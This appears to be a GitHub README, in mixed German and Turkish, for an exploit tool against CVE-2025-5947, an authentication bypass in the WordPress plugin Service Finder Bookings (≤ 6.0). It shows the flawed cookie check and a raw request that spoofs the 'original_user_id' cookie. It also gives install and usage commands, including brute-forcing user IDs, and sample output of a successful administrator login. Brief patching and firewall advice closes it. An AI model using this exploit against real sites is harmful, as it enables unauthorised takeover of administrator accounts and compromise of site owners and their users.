
CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0 Exploit
CVE-2025-5947 Exploit für WordPress Service Finder Bookings ≤ 6.0
Exploit-Tool für die Authentifizierungs-Bypass-Schwachstelle im WordPress-Plugin Service Finder Bookings ≤ 6.0
In Version 6.0 und früheren Versionen des WordPress-Plugins Service Finder Bookings existiert eine kritische Authentifizierungs-Bypass-Schwachstelle.
Nicht authentifizierte Angreifer können:
Die Funktion service_finder_switch_back() weist eine unzureichende Cookie-Validierung auf:
// Güvenli olmayan kod
if(isset($_COOKIE['original_user_id'])) {
$user_id = $_COOKIE['original_user_id'];
wp_set_current_user($user_id);
// Doğrulama yok!
}
GET /wp-admin/admin-ajax.php?action=service_finder_switch_back HTTP/1.1
Host: target.com
Cookie: original_user_id=1
Angriffsmerkmale:
git clone https://github.com/xxconi/CVE-2025-5947.git
cd CVE-2025-5947
pip install -r requirements.txt
python exploit.py -u http://target.com
# Yardım göster
python exploit.py -h
# Admin (ID=1) olarak giriş dene
python exploit.py -u http://target.com
# Belirli kullanıcı ID'si ile
python exploit.py -u http://target.com -i 5
# Brute force (ID 1-10)
python exploit.py -u http://target.com -b 1-10
# SSL doğrulaması olmadan
python exploit.py -u http://target.com --no-ssl-verify
# Özel timeout ile
python exploit.py -u http://target.com -t 30
python exploit.py -u http://wordpress.local
Ausgabe:
============================================================
CVE-2025-5947 Service Finder Bookings Exploit
Authentication Bypass via Cookie Spoofing
============================================================
✅ Service Finder Bookings eklentisi bulundu
🔍 Kullanıcı ID 1 ile giriş denemesi yapılıyor...
📊 HTTP Status: 302
📋 Response Headers:
Location: http://wordpress.local/wp-admin/
Set-Cookie: wordpress_logged_in_abc123=...
✅ BAŞARILI! Admin olarak giriş yapıldı!
📍 Yönlendirme: http://wordpress.local/wp-admin/
python exploit.py -u http://target.com -b 1-20
Ausgabe:
🔄 Brute Force Başlıyor (20 kullanıcı)...
✅ Kullanıcı ID 1: BAŞARILI
❌ Kullanıcı ID 2: Başarısız
✅ Kullanıcı ID 3: BAŞARILI
...
✅ Başarılı Kullanıcılar: [1, 3, 5]
python exploit.py -u https://target.com --no-ssl-verify
Ein erfolgreicher Exploit ist an folgenden Indikatoren erkennbar:
✅ HTTP-Statuscode 301 oder 302
✅ /wp-admin/ im Location-Header
✅ wordpress_logged_in_ im Set-Cookie-Header
Dieses Tool darf nur:
verwendet werden. Der Autor übernimmt keine Haftung.
Sofort aktualisieren
# WordPress admin panelinden güncelle
# veya WP-CLI ile
wp plugin update sf-booking
Plugin deaktivieren
wp plugin deactivate sf-booking
Plugin entfernen
wp plugin delete sf-booking
Web Application Firewall (WAF)
Block: /wp-admin/admin-ajax.php?action=service_finder_switch_back
Sicherheitsprüfung
Um Fehler zu melden oder Verbesserungen vorzuschlagen:
git checkout -b feature/improvement)git commit -am 'Add improvement')git push origin feature/improvement)MIT-Lizenz – Details findest du in der Datei LICENSE
Security Researcher
⭐ Wenn dir dieses Tool nützlich erscheint, gib einen Stern!
| Eigenschaft | Wert |
|---|
| CVE ID | CVE-2025-5947 |
| Plugin | Service Finder Bookings (sf-booking) |
| Betroffene Version | ≤ 6.0 |
| Schweregrad | 🔴 KRITISCH |
| CVSS-Score | 9.8 |
| CWE | CWE-639 (Authorization Bypass) |
| EPSS-Score | 0.617 (98.357 Perzentil) |
| Veröffentlichungsdatum | 2025 |
| Parameter | Abkürzung | Beschreibung | Standard |
|---|
--url | -u | Ziel-URL (erforderlich) | - |
--user-id | -i | Benutzer-ID | 1 |
--brute-force | -b | Brute-Force-Bereich (1-10) | - |
--no-ssl-verify | - | SSL-Validierung deaktivieren | False |
--timeout | -t | Anfrage-Timeout (Sekunden) | 10 |